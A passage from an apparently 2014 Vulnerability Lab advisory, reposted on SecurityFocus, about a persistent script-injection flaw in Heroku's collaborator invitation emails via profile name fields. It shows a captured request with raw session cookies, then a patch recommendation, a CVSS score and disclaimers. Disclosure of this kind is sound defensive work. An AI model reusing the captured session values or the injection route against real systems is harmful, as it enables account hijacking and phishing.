Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip,

deflate]
Content-Type[application/json]
X-CSRF-Token[IKbYx6U4o8Drv7vgoT9gX45Jegk+XVigarkg4=]
X-Requested-With[XMLHttpRequest]
Referer[https://dashboard-next.heroku.com/apps/asdsad/access]
Cookie

[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409170245.2; __utmb=148535982.36.10.1409170245;
__utmc=148535982; __utmz=148535982.1409170245.2.2.utmcsr=google|utmccn=(organic)|utmcmd=or
ganic|
utmctr=(not%20provided); optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22
%3A%22ff%22%2C%22173444194%22%3A%22
false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22
%2C%22221734991%22%3A%22false
%22%7D; optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id
%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-
062d1b005a52%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fdevcen
ter.heroku.com%2Farticles%2Fdynos%22%2C%22%24initial_referring_domain%22
%3A%20%22
devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-
4f65-82b4-19994d4222d3; session=Zy3Pusin4kPPd6OSt9FhcA.neINSzdfS2R5CjblMoRCYUntFqVvMiYai26fqEvBj
FzjfKLFCGPDOq_6gCE32OQk9SO974NplMf13oRR7W1wUpYefJ_
4kYO72VsPtkRKlt1fJ_bbA13yUvVYIHHRwEvtWN_qjk7ZL-
Z09sewhk5I_YCfIEubvb4wNXAETzdbWwxLKNAf1HZQ5qkpKC4vXKpSrXIzkx1Zp1xvKuDFxa
yYaNA3F47iY7i-0mIdcC4qtP20EoaXPANL5YVoUdftj9LuFxMHqeolBDglB4wPTBoJO6rRYh
XvF-
S6D7VCQVUXUDpfHnw-
SizaiacWTAst7KBGtvMb5kUomoPk_7RqJhbWtd7l7opjWQoFdvGBlWCRCyuYQPVoEnT8RCH_
cq5nkwKHMVBKFYSKTuBVDL9n6wxgkh8lofNVtL01sbCunT92Cg8QRvqLKuSfv2uPdFP0ZGDO
BbxCAafFRz_
7lppQ8TfA-Dnd00DMZZoIN-
Pjd84Mntn2Ev7voqqrTjMr85hLCaX48ZLlViIwIHGkyT6fn39hVBvJdWsKpYnOQx8JbbRAcX
G9-z1ogW9iRO-8SvvX7OVDzujbA9mvdL2YgJ-M7loe5dNFKbPfxtJ_bVeVbfqN5rhkjn6a2-
0EelwwrmT8za
GwyCfLj6Dre30FaMRo_spHe_3WQqpmGdtccgHHVfv_fTFUwtmIPVGPV9lBNI-
HdOhfTXe5vNwdMa4O_Zc8h3LJXY_SioLjT2rJpny5jyTpOmnGiKg7_5gBRrVho6a0X62v.14
09166935525.86400000.SB-x_q66Gn0thFKWXzZnGtWq4xqLkWMrXX-s6OPg4yU;
__utma=155690030.1421671373.1409166519.1409166929.1409170304.2; __utmc=155690030;
__utmz=155690030.1409170304.2.2.utmcsr=dashboard.heroku.com|utmccn=(refe
rral)|utmcmd=referral|utmcct=/apps/asdsad/access;
ref=lUfOxJR7MTq-HJ0g1YRMbgJitTUh-GL28r4373os2BeJj-FIGe2wFX7CZkOr-

wrZ6tI3U09rIeKWnfQ2P0aBX2MTYoqdRAdCNgAhXXBmKMuquCTPzqlPdhEPxdpdF70J%7CwC
AYZcZQpXb_iEF_o-HTSQ%3D%3D%7Ce7cb9d999af74418ae28fb1d3b50be583ed9c91ef71
f71aa6080f662f8e0a0f7;
__utmb=155690030.29.10.1409170304]
Connection[keep-alive]

Response Header:
Cache-Control[no-store, no-cache]
Content-Type[application/json]
Date[Wed, 27 Aug 2014 20:25:46 GMT]
Etag["223132457"]
Strict-Transport-Security[max-age=15768000]
x-content-type-options

[nosniff]
X-Download-Options[noopen]
X-Frame-Options[DENY]
X-XSS-Protection[1; mode=block]
Content-Length[2]
Connection[keep-alive]

Reference(s):
https://dashboard.heroku.com
https://devcenter.heroku.com
https://dashboard-next.heroku.com/api/apps/2737d28a-9acd-4352-a3d4-b3efb
5327d12/collaborators
https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607f25dab
10a92
https://dashboard.heroku.com/apps/asdsad/access
https://dashboard-next.heroku.com/alpha-api/notifications
https://dashboard-next.heroku.com/alpha-api
https://dashboard-next.heroku.com/

Solution - Fix & Patch:
=======================
The persistent input validation web vulnerability can be patched by a secure parse and encode of the `first- & lastname` input values of the heroku profile.
Restrict the input fields on registration and disallow special char as name value input to prevent exploitation.

Filter and encode also the outgoing the `Invite to collaborate` and `Invite to heroku` mail context to prevent persistent script code execution, hijacking attacks or phishing attempts.

Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the notification service (api) is estimated as medium. (CVSS 4.1)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus